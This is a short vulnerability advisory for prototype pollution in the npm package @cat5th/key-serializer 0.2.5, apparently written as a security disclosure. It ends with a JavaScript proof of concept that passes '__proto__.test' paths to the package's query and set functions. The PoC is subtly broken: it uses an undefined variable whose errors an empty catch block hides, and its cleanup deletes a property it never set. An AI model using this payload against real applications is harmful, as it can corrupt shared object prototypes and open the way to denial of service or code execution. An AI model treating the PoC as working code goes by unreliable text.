Vulnerability type: Prototype Pollution
Vendor of the Package: harvey-woo
Affected Package:
- Product: @cat5th/key-serializer
- Version: 0.2.5
Affected component(s):
query, set, default.query, default.set
Attack vector(s):
the attacker can modify built-in Object.prototype by calling the vulnerable function: query, set, default.query, default.set
with an argument containing a special property __proto__
to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.
Description:
Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: query, set, default.query, default.set
. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__
. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack
Proof-of-Concept:
(async () => {
const lib = await import('@cat5th/key-serializer');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.query (emptyObj, "__proto__.test", 123)
lib.set (emptyObj, "__proto__.test", 123)
lib.default.query (emptyObj, "__proto__.test", 123)
lib.default.set (emptyObj, "__proto__.test", 123)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();